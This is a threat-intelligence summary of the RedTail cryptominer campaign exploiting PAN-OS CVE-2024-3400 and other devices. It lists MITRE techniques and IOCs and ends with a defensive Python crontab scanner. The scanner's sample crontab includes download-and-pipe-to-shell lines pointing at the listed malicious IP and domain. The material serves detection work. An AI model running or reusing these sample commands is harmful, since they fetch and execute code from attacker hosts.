RedTail cryptominer actors have updated their toolkit to include Palo Alto PAN-OS CVE-2024-3400, leveraging private mining pools for tighter control over operations. The campaign features enhanced evasion, multiple exploit vectors across IoT devices and VPN/security products, and a polished, persistence-ready delivery infrastructure. Hashtags: #RedTail #PAN-OS #CVE-2024-3400 #IvantiConnectSecure #ThinkPHP #TP-Link #LazarusGroup #Monero #XMRig
Keypoints
- RedTail cryptomining actors have incorporated CVE-2024-3400 (PAN-OS) into their toolkit since April 2024.
- Attackers moved to private mining pools to gain greater control over mining outcomes, suggesting higher operational costs and sophistication.
- The new variant adds anti-research and persistence techniques, such as forking and cron-based startup.
- Exploitation spans at least six vectors, including IoT (TP-Link), ThinkPHP, SSL-VPNs (Ivanti Connect Secure), and security appliances such as Palo Alto PAN-OS, which has been exploited since April 21.
- Malware delivery uses a robust, multi-server infrastructure hosted by legitimate providers.
- Indicators of compromise (IOCs) are documented to aid detection and mitigation.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges; ‘The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges’
- [T1068] Exploitation for Privilege Escalation – The vulnerability could enable command execution with root privileges; ‘The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges’
- [T1059.004] Command and Scripting Interpreter – Unix Shell – The botnet attempted to download and run a bash script; ‘attempts to execute commands that download and run a bash script’
- [T1082] System Information Discovery – The script checks processor architecture (ARM, 86 bit, or 64 bit); ‘checking whether it is ARM, 86 bit, or 64 bit’
- [T1105] Ingress Tool Transfer – The bash script downloads a compatible binary; ‘downloading the corresponding compatible binary’
- [T1027] Obfuscated Files or Information – The miner uses an encrypted configuration that is decrypted at runtime; ‘encrypted configuration. The miner comes with its mining configuration encrypted then decrypts it before passing control to XMRig’s code’
- [T1053.005] Scheduled Task/Job – Cron – Cron-based persistence to survive reboots; ‘adds a cron job to survive a system reboot’
Indicators of Compromise
- Exploit origin IP addresses – 92.118.39.120, 193.222.96.163
- Malware hosting servers – 193.222.96.163, 185.216.70.138
- Domain names – proxies.identitynetwork.top
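Putting the cron-based persistence technique ([T1053.005]) and the IOCs above to defensive use, here is an added example that is not part of the Akamai post or this summary: a small Python checker that flags crontab entries referencing the listed IPs or domain, or matching a generic download-and-execute shape (that heuristic is an assumption, not something the report states). The sample crontab is constructed.

```python
import re

# IOCs exactly as listed in the summary above (the only page-specific values used).
IOC_IPS = {"92.118.39.120", "193.222.96.163", "185.216.70.138"}
IOC_DOMAINS = {"proxies.identitynetwork.top"}

# Assumed heuristic (not from the report): a fetch tool whose output is piped into a
# shell, or a fetch followed by chmod +x / sh <file> in the same cron command.
FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*(\|\s*(ba)?sh\b|(&&|;)\s*(chmod\s+\+x|(ba)?sh\s+\S+))"
)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def classify_cron_line(line):
    """Return the reasons a crontab line looks suspicious, or [] if it looks clean."""
    reasons = []
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return reasons
    # Exact matches against the report's IOCs.
    for ip in IP_RE.findall(stripped):
        if ip in IOC_IPS:
            reasons.append(f"ioc-ip:{ip}")
    for host in HOST_RE.findall(stripped):
        if host.lower() in IOC_DOMAINS:
            reasons.append(f"ioc-domain:{host}")
    # Behavioural match: the report says the cron job exists to re-run a downloaded script.
    if FETCH_EXEC.search(stripped):
        reasons.append("download-and-execute")
    return reasons


def scan_cron(lines):
    """Map each flagged crontab line to its list of reasons."""
    flagged = {}
    for line in lines:
        reasons = classify_cron_line(line)
        if reasons:
            flagged[line] = reasons
    return flagged


# Constructed sample crontab (paths and schedules are made up for illustration).
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "@reboot curl -s http://193.222.96.163/constructed.sh | sh",
    "*/5 * * * * wget -q http://proxies.identitynetwork.top/x -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
    "*/10 * * * * /usr/local/bin/backup.sh",
]

if __name__ == "__main__":
    for line, reasons in scan_cron(SAMPLE_CRONTAB).items():
        print(reasons, "<-", line)
```

Run it against `crontab -l` output or the files under /etc/cron.d to triage hosts; a hit on the behavioural rule alone warrants a look even without an IOC match, since the hosting infrastructure can change.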
Read more: https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit